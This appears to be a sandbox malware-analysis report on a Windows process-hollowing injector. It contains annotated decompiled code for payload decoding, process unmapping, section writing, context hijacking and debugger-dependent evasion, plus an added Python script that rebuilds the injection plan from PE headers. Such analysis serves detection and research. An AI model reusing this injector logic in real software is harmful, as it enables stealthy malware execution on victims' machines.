Path: C:\Users\user\Desktop\GqSL8M2a72.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Imagebase: 0x400000
File size: 161962 bytes
MD5 hash: 4FC29198FCC9A9FE3B31F7549D54D8E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 86%
    			E0042694B(void* __edx) {
    				WCHAR* _v8;
    				char _v12;
    				intOrPtr _v16;
    				void* _v20;
    				void* _v24;
    				long _v28;
    				struct _PROCESS_INFORMATION _v44;
    				long _v48;
    				void _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				char _v68;
    				struct _STARTUPINFOW _v136;
    				long _v140;
    				intOrPtr _v692;
    				struct _CONTEXT _v856;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t92;
    				void* _t94;
    				void* _t96;
    				WCHAR* _t98;
    				int _t105;
    				intOrPtr _t109;
    				void* _t110;
    				intOrPtr _t115;
    				WCHAR* _t117;
    				signed char _t119;
    				long _t122;
    				void* _t125;
    				intOrPtr _t126;
    				long _t132;
    				intOrPtr _t135;
    				long _t139;
    				long _t144;
    				void* _t145;
    				intOrPtr _t147;
    				void* _t156;
    				long _t157;
    				long _t162;
    				void* _t171;
    				signed int _t181;
    				void* _t185;
    				void* _t188;
    				intOrPtr _t208;
    				intOrPtr _t210;
    				void* _t211;
    				void* _t212;
    				void* _t213;
    				void* _t214;
    				void* _t215;
    
    				_t193 = __edx;
    				_t92 =  *0x42a524;
    				_t212 = _t211 - 0x354;
    				if(_t92 != 0) {
    					 *((intOrPtr*)( *0x4294ec + 0x20)) = _t92;
    				}
    				E0040101D("asdxgbn");
    				_t94 =  *0x4282a0; // 0x5e0000
    				_v856 = 0x10007;
    				_v20 = _t94;
    				if( *0x4294ec != 0) {
    					_v136.cb = 0x44;
    				}
    				_v136.cbReserved2 = 0;
    				_v136.dwFillAttribute = 0;
    				_v136.dwFlags = 0;
    				_v136.dwX = 0;
    				_v136.dwXCountChars = 0;
    				_v136.dwXSize = 0;
    				_v136.dwYCountChars = 0;
    				_v136.dwY = 0;
    				_v136.dwYSize = 0;
    				_v136.hStdError = 0;
    				_v136.hStdInput = 0;
    				_v136.hStdOutput = 0;
    				_v12 = 0;
    				_v136.lpDesktop = 0;
    				_v136.lpReserved = 0;
    				_v136.lpReserved2 = 0;
    				_v136.lpTitle = 0;
    				_v136.wShowWindow = 0;
    				_t96 = E00401032("CreateProcessW"); // executed
    				_t98 = E004011B6(0, 0, _t193, _t96);
    				_push(0x7c99b767);
    				_v8 = _t98;
    				E0040101D("utanwvwedwitpi%X"); // executed
    				if(CreateProcessW(0, 0x4292b0, 0, 0, 0, 4, 0, 0,  &_v136,  &_v44) == 0) {
    					_push(0x7c99b767);
    					E0040101D("utanwvwedwitpi%X");
    					goto L26;
    				} else {
    					NtGetContextThread(_v44.hThread,  &_v856); // executed
    					E0040101D("asdxgbn");
    					_t109 =  *0x428284; // 0x401748
    					_t29 = _t109 + 0xd; // 0x400000
    					 *0x428294 =  *_t29;
    					_t30 = _t109 + 0xd; // 0x400000
    					_t110 =  *_t30;
    					_v16 = _v692;
    					_v24 = _t110;
    					NtUnmapViewOfSection(_v44.hProcess, _t110); // executed
    					 *0x428290 = _v44.hProcess;
    					while(1) {
    						_t181 =  *0x428278; // 0xf808ba61
    						_t115 =  *0x428284; // 0x401748
    						_t40 = _t115 + 0x11; // 0x27000
    						 *0x428298 = _t181 * ( *( *0x4294ec + 2) & 0x000000ff) +  *_t40;
    						_t117 = E0042656B(0x428290);
    						_v8 = _t117;
    						if(_t117 >= 0) {
    							break;
    						}
    						_push(0x7c99b767);
    						_push(0x7c99b767);
    						_push(0x7c99b767);
    						E0040101D("qjqrpyiwswriwrivlchdktbnooowoh%X%d%x");
    						_t119 = "juuwxho"; // 0x6a
    						_t212 = _t212 + 0x10;
    						__eflags = _v12 - (_t119 & 0x000000ff);
    						if(_v12 >= (_t119 & 0x000000ff)) {
    							_t122 = E0042656B(0x428290);
    							_v8 = _t122;
    							__eflags = _t122;
    							if(__eflags < 0) {
    								_push(0x7c99b767);
    								_push(0x7c99b767);
    								E0040101D("eawxwtivhfieihxvuudg%d0%X");
    								_t212 = _t212 + 0xc;
    								 *0x428294 = 0;
    								_v8 = E0042656B(0x428290);
    							}
    							L10:
    							SetUnhandledExceptionFilter(E00401234); // executed
    							if(_v8 >= 0) {
    								E0040101D("utanwvwedwitpi%X");
    								_t125 =  *0x428294; // 0x400000
    								_t185 = 0x7c99b767;
    								_v52 = _t125;
    								_t126 = E004263D9(0, _t185, _t193, __eflags);
    								_push(0x7c99b767);
    								 *0x42a504 = _t126; // executed
    								E0040101D("utanwvwedwitpi%X"); // executed
    								_t132 = NtWriteVirtualMemory(_v44.hProcess, _v16 + 8,  &_v52, 4,  &_v28); // executed -- PEB->ImageBaseAddress (PEB+8) := allocated base
    								__eflags = _t132;
    								if(_t132 < 0) {
    									goto L11;
    								}
    								_v60 =  *0x42a520;
    								_v68 =  *0x42a528;
    								_t135 =  *0x4282a0; // 0x5e0000
    								_push(0x7c99b767);
    								_v64 = _t135;
    								_push(0x7c99b767);
    								_v56 =  *0x42a51c;
    								E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
    								_push(0x7c99b767);
    								E0040101D("utanwvwedwitpi%X"); // executed
    								_t213 = _t212 + 0x14;
    								_t139 = E004268FF( &_v68); // executed
    								__eflags = _t139;
    								if(_t139 == 0) {
    									E0040101D("asdxgbn");
    									goto L11;
    								}
    								_push(0x7c99b767);
    								E0040101D("utanwvwedwitpi%X"); // executed
    								_t208 =  *((intOrPtr*)(_v20 + 0x3c)) + _v20; // _v20 = decoded payload image; e_lfanew -> IMAGE_NT_HEADERS
    								_push(0x7c99b767);
    								_v16 = _t208;
    								E0040101D("utanwvwedwitpi%X"); // executed
    								_t214 = _t213 + 0x10;
    								_t144 = NtWriteVirtualMemory(_v44.hProcess,  *0x428294, _v20,  *(_t208 + 0x54),  &_v28); // executed -- copy SizeOfHeaders (NT+0x54) bytes of headers to the new base
    								__eflags = _t144;
    								if(_t144 >= 0) {
    									_t145 = E00401032("ZwProtectVirtualMemory"); // executed -- E00401032/E004011B6 = string decrypt + LoadLibraryA/GetProcAddress resolve (see API list of E0040135D)
    									_t147 = E004011B6(1, 0, _t193, _t145);
    									_push(0x7c99b767);
    									_push(0x7c99b767);
    									 *0x4282ac = _t147; // executed
    									E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
    									_t210 = _v16;
    									_t215 = _t214 + 0xc;
    									_v8 = 0;
    									__eflags = 0 -  *(_t210 + 6); // NT+6 = FileHeader.NumberOfSections
    									if(0 >=  *(_t210 + 6)) {
    										L25:
    										E0042658E(_t193,  *0x428294, _t210,  &_v44,  &_v856); // executed -- set CONTEXT.Eax to the payload entry point, NtSetContextThread, NtResumeProcess
    										L26:
    										ExitProcess(0x7c99b767); // executed -- exit code is a junk constant
    									}
    									_v12 = 0;
    									do {
    										_t188 = _v20;
    										_t171 =  *((intOrPtr*)(_t188 + 0x3c)) + _v12 + _t188 + 0xf8; // section header i: NT + 0xf8 (0x18 + PE32 optional header 0xe0) + i*0x28
    										_t156 =  *((intOrPtr*)(_t171 + 0xc)) +  *0x428294; // +0xc VirtualAddress, rebased
    										_v24 = _t156;
    										_v48 =  *((intOrPtr*)(_t171 + 8)); // +8 VirtualSize
    										_t193 =  *((intOrPtr*)(_t171 + 0x14)) + _t188; // +0x14 PointerToRawData
    										_t157 = NtWriteVirtualMemory(_v44.hProcess, _t156,  *((intOrPtr*)(_t171 + 0x14)) + _t188,  *(_t171 + 0x10),  &_v28); // executed -- +0x10 SizeOfRawData bytes of section i
    										__eflags = _t157;
    										if(_t157 < 0) {
    											goto L24;
    										}
    										_t162 = NtProtectVirtualMemory(_v44.hProcess,  &_v24,  &_v48, E00426CDE( *((intOrPtr*)(_t171 + 0x24))),  &_v140); // executed -- first member of the PROCESS_INFORMATION is hProcess; E00426CDE maps +0x24 Characteristics to a PAGE_* protection
    										__eflags = _t162;
    										if(_t162 < 0) {
    											goto L25;
    										}
    										_push(0x7c99b767);
    										_push(0x7c99b767);
    										_push(0x7c99b767);
    										E0040101D("qjqrpyiwswriwrivlchdktbnooowoh%X%d%x"); // executed
    										_t215 = _t215 + 0x10;
    										L24:
    										_v8 =  &(_v8[0]);
    										_v12 = _v12 + 0x28;
    										__eflags = _v8 - ( *(_t210 + 6) & 0x0000ffff);
    									} while (_v8 < ( *(_t210 + 6) & 0x0000ffff));
    									goto L25;
    								}
    								_t105 = 0x7c99b767;
    								L12:
    								return _t105;
    							}
    							L11:
    							_t105 = 0;
    							goto L12;
    						}
    						_t37 =  &_v12;
    						 *_t37 = _v12 + 1;
    						__eflags =  *_t37;
    					}
    					E0040101D("asdxgbn"); // executed
    					goto L10;
    				}
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x0042694b to 0x00426cd5

    APIs
    • CreateProcessW.KERNELBASE(00000000,004292B0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,asdxgbn,FlushInstructionCache,utanwvwedwitpi%X), ref: 00426A14
    • NtGetContextThread.NTDLL(?,00010007), ref: 00426A29
    • NtUnmapViewOfSection.NTDLL(?,00400000), ref: 00426A5B
    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001234), ref: 00426ACE
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
    • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 00426B4C
    • NtWriteVirtualMemory.NTDLL(?,?,?,?), ref: 00426BD3
    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,?,?,00000000), ref: 00426C52
    • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,?), ref: 00426C77
    • ExitProcess.KERNEL32 ref: 00426CBD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: MemoryVirtual$Write$Process$ContextCreateDebugExceptionExitFilterOutputProtectSectionStringThreadUnhandledUnmapView
    • String ID: ($CreateProcessW$D$FlushInstructionCache$ZwProtectVirtualMemory$asdxgbn$eawxwtivhfieihxvuudg%d0%X$juuwxho$qjqrpyiwswriwrivlchdktbnooowoh%X%d%x$utanwvwedwitpi%X
    • API String ID: 1800598123-2899511959
    • Opcode ID: cc89499e51efe65e3e7433f20a06dac176252773f30c3b572d2b680b834a2253
    • Instruction ID: 0089f9647ac6b02fc778d6c97e1f63c2d5a1d0ea3fadbc31d8d4f7d017f031d0
    • Opcode Fuzzy Hash: cc89499e51efe65e3e7433f20a06dac176252773f30c3b572d2b680b834a2253
    • Instruction Fuzzy Hash: F5B15E71E01268EFCB10DF95EC859AEBBB8FF48304B9440BEE504E7251DA389945CF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004015DA(void* __ebx, void* __edi) {
    				void* __esi;
    				void* _t12;
    				void* _t14;
    				signed int _t18;
    				signed int _t23;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t34;
    				intOrPtr _t36;
    				intOrPtr* _t37;
    				intOrPtr _t38;
    				intOrPtr _t39;
    				void* _t40;
    				signed short* _t42;
    				signed short* _t43;
    				signed int* _t48;
    				signed int* _t49;
    				void* _t50;
    				void* _t55;
    				void* _t57;
    
    				_t50 = __edi;
    				_t40 = __ebx;
    				E0040101D("asdxgbn"); // executed
    				_t12 = HeapCreate(0, 0x16fcd8, 0); // executed
    				 *0x42a4f4 = _t12;
    				if(_t12 != 0) {
    					L2:
    					_t14 =  *(E00401016() + 0x30); // TEB+0x30 = PEB (every later use of 0x4294ec is a PEB field)
    					 *0x4294ec = _t14;
    					if(_t14 == 0) {
    						goto L4;
    					} else {
    						_t42 =  *( *((intOrPtr*)( *0x4294ec + 0x10)) + 0x44); // PEB->ProcessParameters (+0x10) -> CommandLine.Buffer (+0x44)
    						_push(_t50);
    						_t48 = 0x4292b0; // destination buffer later passed to CreateProcessW as lpCommandLine
    						do {
    							_t18 =  *_t42 & 0x0000ffff;
    							 *_t48 = _t18;
    							_t42 =  &(_t42[1]);
    							_t48 =  &(_t48[0]);
    						} while (_t18 != 0);
    						_push(0x3e872ca4);
    						_push(0x3e872ca4);
    						E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
    						E0040101D("utanwvwedwitpi%X"); // executed
    						_t43 =  *( *((intOrPtr*)( *0x4294ec + 0x10)) + 0x44);
    						_t49 = 0x4292b0;
    						_t55 = 0x3e872ca4;
    						do {
    							_t23 =  *_t43 & 0x0000ffff;
    							 *_t49 = _t23;
    							_t43 =  &(_t43[1]);
    							_t49 =  &(_t49[0]);
    						} while (_t23 != 0);
    						 *0x428284 = 0x401748;
    						E0040101D("asdxgbn"); // executed
    						_t28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *0x4294ec + 0xc)) + 0xc)))); // PEB->Ldr (+0xc) -> InLoadOrderModuleList.Flink (+0xc): first LDR_DATA_TABLE_ENTRY = this executable
    						 *0x428288 = _t28;
    						 *0x42a500 = _t28;
    						 *0x42a518 =  *((intOrPtr*)(_t28 + 0x18)); // executed -- +0x18 DllBase of the executable
    						_t30 = E00401032("NtAllocateVirtualMemory"); // executed
    						 *0x42a4f0 = E004011B6(1, _t40, _t49, _t30);
    						_t57 = _t55;
    						_push(_t57);
    						E0040101D("asdxgbn"); // executed
    						_t34 = E00401032("ZwUnmapViewOfSection"); // executed
    						_t36 = E004011B6(1, _t40, _t49, _t34);
    						 *0x428000 =  *0x428000 | 0x00002000;
    						 *0x42829c = _t36;
    						_t37 =  *0x428288; // 0x682e70
    						_t38 =  *_t37; // next entry in load order (normally ntdll.dll)
    						 *0x428288 = _t38;
    						 *0x42a500 = _t38;
    						_t39 =  *((intOrPtr*)(_t38 + 0x18)); // its DllBase
    						 *0x42a530 =  *( *0x4294ec + 2) & 0x000000ff; // PEB.BeingDebugged, reused as an argument or addend in the NtAllocateVirtualMemory wrappers
    						 *0x42a510 = _t39;
    						return _t39;
    					}
    				} else {
    					_t14 = GetProcessHeap();
    					 *0x42a4f4 = _t14;
    					if(_t14 == 0) {
    						L4:
    						return _t14;
    					} else {
    						goto L2;
    					}
    				}
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x004015da to 0x0040173a

    APIs
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
    • HeapCreate.KERNELBASE(00000000,0016FCD8,00000000,00401586), ref: 004015EE
    • GetProcessHeap.KERNEL32 ref: 004015FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: Heap$CreateDebugOutputProcessString
    • String ID: NtAllocateVirtualMemory$ZwUnmapViewOfSection$asdxgbn$eawxwtivhfieihxvuudg%d0%X$p.h$utanwvwedwitpi%X
    • API String ID: 2742831793-2131156820
    • Opcode ID: 38c67a580e8236ede4afe964cbec2e317ea3fea706778b025de380d8fb144f04
    • Instruction ID: e5516d2686025df9b216e2e8a5d8cb179dec33a435564fb0075ebe591fadafa5
    • Opcode Fuzzy Hash: 38c67a580e8236ede4afe964cbec2e317ea3fea706778b025de380d8fb144f04
    • Instruction Fuzzy Hash: 1C316B74B052118FC324EF69EC45E563BA4BB5831479440BBE904DB3B1EB799842CB6D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0042658E(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CONTEXT* _a16) {
    				void* __ebx;
    				void* __esi;
    				signed char _t9;
    				signed char _t10;
    				void* _t13;
    				long _t17;
    				void* _t22;
    				signed char _t26;
    				signed char _t27;
    				CONTEXT* _t30;
    				intOrPtr* _t31;
    				signed char _t34;
    				signed char _t40;
    				void* _t43;
    				void* _t45;
    				intOrPtr* _t47;
    
    				_t43 = __edx;
    				_t30 = _a16;
    				_t44 = "asdxgbn";
    				E0040101D("asdxgbn");
    				_t9 = "uuwxho"; // 0x75
    				_t10 =  *0x428273; // 0x77
    				_t34 = "juuwxho"; // 0x6a
    				_t45 = 0;
    				if(_t34 * _t10 * _t9 > 0) {
    					do {
    						_t45 = _t45 + 1;
    						 *((intOrPtr*)(_t30 + 0xb0)) =  *((intOrPtr*)(_a8 + 0x28)) + _a4; // CONTEXT.Eax (+0xb0) = new ImageBase + AddressOfEntryPoint (NT+0x28); the loop bound is a junk product of string bytes
    						_t26 = "uuwxho"; // 0x75
    						_t27 =  *0x428273; // 0x77
    						_t40 = "juuwxho"; // 0x6a
    					} while (_t45 < _t40 * _t27 * _t26);
    				}
    				_t13 = E00401032("NtResumeProcess"); // executed
    				_t47 = E004011B6(1, _t30, _t43, _t13); // executed
    				E0040101D(_t44); // executed
    				_t31 = _a12;
    				_t17 = NtSetContextThread( *(_t31 + 4), _t30); // executed -- _a12 = &PROCESS_INFORMATION, +4 = hThread
    				if(_t17 >= 0) {
    					E0040101D(_t44); // executed
    					E0040101D(_t44); // executed
    					E0040101D(_t44); // executed
    					 *_t47( *_t31); // executed -- NtResumeProcess(hProcess)
    					_t22 = E0040101D(_t44); // executed
    					return _t22;
    				}
    				return _t17;
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x0042658e to 0x0042664b

    APIs
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
    • NtSetContextThread.NTDLL(?,?,00000000), ref: 0042661D
    • NtResumeProcess.NTDLL(?), ref: 0042663E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: ContextDebugOutputProcessResumeStringThread
    • String ID: NtResumeProcess$asdxgbn$juuwxho
    • API String ID: 3632123085-45952772
    • Opcode ID: 26bfeced9572530dcff3606bb280507cbf6910dbb8f2d8ab2111e9b1d87a4cf6
    • Instruction ID: f22c4f2b92b37300b29d808eac3de40bbc1a686723c17df8826b547dfebf2ca7
    • Opcode Fuzzy Hash: 26bfeced9572530dcff3606bb280507cbf6910dbb8f2d8ab2111e9b1d87a4cf6
    • Instruction Fuzzy Hash: BC11CB316044A0ABC719AF76ACD587F7FEC5A4531578401BFF884E7663CA2C84469B7C
    Uniqueness

    Uniqueness Score: -1.00%
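
    The hollowing loop in the function at 0x00426A14 and the entry-point fix-up in E0042658E both read the payload's PE32 headers at fixed offsets (e_lfanew at 0x3c, NumberOfSections at NT+6, AddressOfEntryPoint at NT+0x28, SizeOfHeaders at NT+0x54, section headers at NT+0xf8 in 0x28-byte steps). The following is an added example, not code from the sample or from this report: it rebuilds the same write/protect plan in Python on a constructed two-section PE32, which is a convenient way to check a payload dumped from the hollowed child against what the injector would have written. section_protection is an assumed mapping (the body of E00426CDE is not shown in the report; the standard loader translation of section flags is used instead), and requested_alloc_size reproduces the 0xf808ba61 * PEB.BeingDebugged + SizeOfImage computation stored at 0x428298.

```python
"""Added example (not from the sample or the report): rebuild the hollowing write plan
that the decompiled injector derives from the payload's PE32 headers."""
import struct

# Section Characteristics flags and PAGE_* constants (Windows values)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80


def section_protection(characteristics: int) -> int:
    """Assumed stand-in for E00426CDE (not shown in the report): the standard loader
    translation of section flags to a page protection."""
    x = bool(characteristics & IMAGE_SCN_MEM_EXECUTE)
    r = bool(characteristics & IMAGE_SCN_MEM_READ)
    w = bool(characteristics & IMAGE_SCN_MEM_WRITE)
    table = {
        (False, False, False): PAGE_NOACCESS, (False, True, False): PAGE_READONLY,
        (False, False, True): PAGE_WRITECOPY, (False, True, True): PAGE_READWRITE,
        (True, False, False): PAGE_EXECUTE, (True, True, False): PAGE_EXECUTE_READ,
        (True, False, True): PAGE_EXECUTE_WRITECOPY, (True, True, True): PAGE_EXECUTE_READWRITE,
    }
    return table[(x, r, w)]


def requested_alloc_size(size_of_image: int, being_debugged: int) -> int:
    """RegionSize as computed at 0x428298: 0xf808ba61 * PEB.BeingDebugged + SizeOfImage (32-bit)."""
    return (0xF808BA61 * being_debugged + size_of_image) & 0xFFFFFFFF


def plan_hollow_writes(image: bytes, new_base: int) -> dict:
    """Walk the PE32 headers with the same offsets as the decompiled loop and return
    the remote writes and per-section protections the injector would apply."""
    nt = struct.unpack_from("<I", image, 0x3C)[0]                 # e_lfanew -> IMAGE_NT_HEADERS
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", image, nt + 6)[0]     # FileHeader.NumberOfSections
    entry_rva = struct.unpack_from("<I", image, nt + 0x28)[0]     # AddressOfEntryPoint
    size_of_image = struct.unpack_from("<I", image, nt + 0x50)[0]
    size_of_headers = struct.unpack_from("<I", image, nt + 0x54)[0]
    writes = [("peb+8 ImageBaseAddress", None, struct.pack("<I", new_base)),
              ("headers", new_base, image[:size_of_headers])]
    protections = []
    for i in range(num_sections):
        sh = nt + 0xF8 + i * 0x28                                 # IMAGE_SECTION_HEADER i (PE32)
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, sh + 8)
        characteristics = struct.unpack_from("<I", image, sh + 0x24)[0]
        name = image[sh:sh + 8].rstrip(b"\0").decode("ascii", "replace")
        writes.append((name, new_base + va, image[raw_ptr:raw_ptr + raw_size]))
        protections.append((new_base + va, vsize, section_protection(characteristics)))
    return {
        "num_sections": num_sections,
        "size_of_image": size_of_image,
        "context_eax": new_base + entry_rva,                       # value E0042658E stores at CONTEXT+0xb0
        "writes": writes,
        "protections": protections,
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 with two sections, used as offline input; not the analysed sample."""
    img = bytearray(0x600)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                                   # e_lfanew
    nt = 0x80
    img[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 2, 0, 0, 0, 0xE0, 0x102)  # IMAGE_FILE_HEADER
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                                   # PE32 magic
    struct.pack_into("<I", img, opt + 0x10, 0x1000)                           # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 0x1C, 0x400000)                         # ImageBase
    struct.pack_into("<II", img, opt + 0x20, 0x1000, 0x200)                   # Section/FileAlignment
    struct.pack_into("<II", img, opt + 0x38, 0x3000, 0x200)                   # SizeOfImage, SizeOfHeaders
    sections = [(b".text", 0x100, 0x1000, 0x200, 0x200, 0x60000020),
                (b".data", 0x10, 0x2000, 0x200, 0x400, 0xC0000040)]
    for i, (name, vsize, va, raw_size, raw_ptr, flags) in enumerate(sections):
        sh = nt + 0xF8 + i * 0x28
        img[sh:sh + len(name)] = name
        struct.pack_into("<IIII", img, sh + 8, vsize, va, raw_size, raw_ptr)
        struct.pack_into("<I", img, sh + 0x24, flags)
        img[raw_ptr:raw_ptr + raw_size] = (b"\xC3" if name == b".text" else b"A") * raw_size
    return bytes(img)


if __name__ == "__main__":
    plan = plan_hollow_writes(build_sample_pe(), 0x400000)
    print(f"entry point for CONTEXT.Eax: {plan['context_eax']:#x}")
    for label, addr, data in plan["writes"]:
        where = f"{addr:#x}" if addr is not None else "PEB+8"
        print(f"write {label:24s} -> {where} ({len(data)} bytes)")
    for addr, size, prot in plan["protections"]:
        print(f"protect {addr:#x} size {size:#x} -> {prot:#04x}")
    print(f"RegionSize with BeingDebugged=1: {requested_alloc_size(0x27000, 1):#x}")
```

    Run it against a real payload by replacing build_sample_pe() with the decoded image bytes and new_base with the value NtAllocateVirtualMemory returned in the child; the RegionSize line shows why the allocation fails under a debugger without any explicit IsDebuggerPresent call.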

    C-Code - Quality: 83%
    			E00401145(char* _a4, DWORD* _a8) {
    				DWORD* _t9;
    				BYTE* _t12;
    
    				_t9 = _a8;
    				_push(0xd768074e);
    				_t13 = "utanwvwedwitpi%X";
    				E0040101D("utanwvwedwitpi%X"); // executed
    				_push(0xd768074e);
    				E0040101D(_t13); // executed
    				_t12 = HeapAlloc( *0x42a4f4, 8, 0x24c7d);
    				if(_t12 == 0) {
    					L2:
    					E0040101D("asdxgbn");
    					 *_t9 =  *_t9 & 0x00000000;
    				} else {
    					 *_t9 = 0x24c7d;
    					if(CryptStringToBinaryA(_a4, 0x24c7c, 1, _t12, _t9, 0, 0) == 0) { // dwFlags 1 = CRYPT_STRING_BASE64: decode the 0x24c7c-byte embedded string into the 0x24c7d-byte heap buffer
    						goto L2;
    					}
    				}
    				return _t12;
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x00401149 to 0x004011b3

    APIs
      • Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027
    • HeapAlloc.KERNEL32(00000008,00024C7D,00000000,00000000), ref: 00401177
    • CryptStringToBinaryA.CRYPT32(?,00024C7C,00000001,00000000,00000000,00000000,00000000), ref: 00401195
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: String$AllocBinaryCryptDebugHeapOutput
    • String ID: asdxgbn$utanwvwedwitpi%X
    • API String ID: 5594083-2624427986
    • Opcode ID: 124f3ed19d6bfd8ff75f73c34bf11eaf1128148241b054baf25a356a7057a415
    • Instruction ID: 3715dd168f9bf6af97242894a17cbed62ab9b8c26c736d1d6d2338c9c26910e2
    • Opcode Fuzzy Hash: 124f3ed19d6bfd8ff75f73c34bf11eaf1128148241b054baf25a356a7057a415
    • Instruction Fuzzy Hash: F1F0C83274162077D7312A56AC49F47BA5DEF85B64F500036F608B62D1C678584546AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00401326(void* __ecx) {
    				long _v8;
    				long _t8;
    
    				_v8 = ( *( *0x4294ec + 2) & 0x000000ff) +  *0x42a520; // RegionSize = PEB.BeingDebugged + stored size
    				_t8 = NtAllocateVirtualMemory(0xffffffff, 0x4282a0, 0,  &_v8, 0x1000, 4); // executed -- current process (-1), base stored at 0x4282a0, MEM_COMMIT, PAGE_READWRITE
    				return _t8 + 0x32f7e435;
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x00401340 to 0x0040135c

    APIs
    • NtAllocateVirtualMemory.NTDLL(000000FF,004282A0,00000000,?,00001000,00000004,AE044E5E,?,004013E3,00000000,00000000), ref: 00401350
    Memory Dump Source
    • Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp
    Similarity
    • API ID: AllocateMemoryVirtual
    • String ID:
    • API String ID: 2167126740-0
    • Opcode ID: 42dc475ab22a10b81b0128247cc73673f273297e82ad081592f32b14b4415b22
    • Instruction ID: 8007aae11479214b708dad8ec5964b5ec7822f547f31ca7e65a847bcc3a7f65d
    • Opcode Fuzzy Hash: 42dc475ab22a10b81b0128247cc73673f273297e82ad081592f32b14b4415b22
    • Instruction Fuzzy Hash: 39E0C271304244BBC710CB48DD03F5677A8AB08758F940267B610E61D1D5B4EA11875C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042656B(void** __eax) {
    				long _t5;
    
    				_t4 = __eax;
    				_t1 =  &(_t4[2]); // 0x428298
    				_t3 =  &(_t4[1]); // 0x428294
    				_t5 = NtAllocateVirtualMemory( *__eax, _t3,  *( *0x4294ec + 2) & 0x000000ff, _t1, 0x3000, 0x40); // executed -- hProcess at 0x428290, &base at 0x428294, ZeroBits = PEB.BeingDebugged, &size at 0x428298, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
    				return _t5;
    			}

    Instruction address column for the listing above (one address per decompiled line, flattened by extraction): 0x0042656b to 0x0042658d

    APIs
    • NtAllocateVirtualMemory.NTDLL(00428290,00428294,?,00428298,00003000,00000040,00426AB7), ref: 00426587
    Memory Dump Source
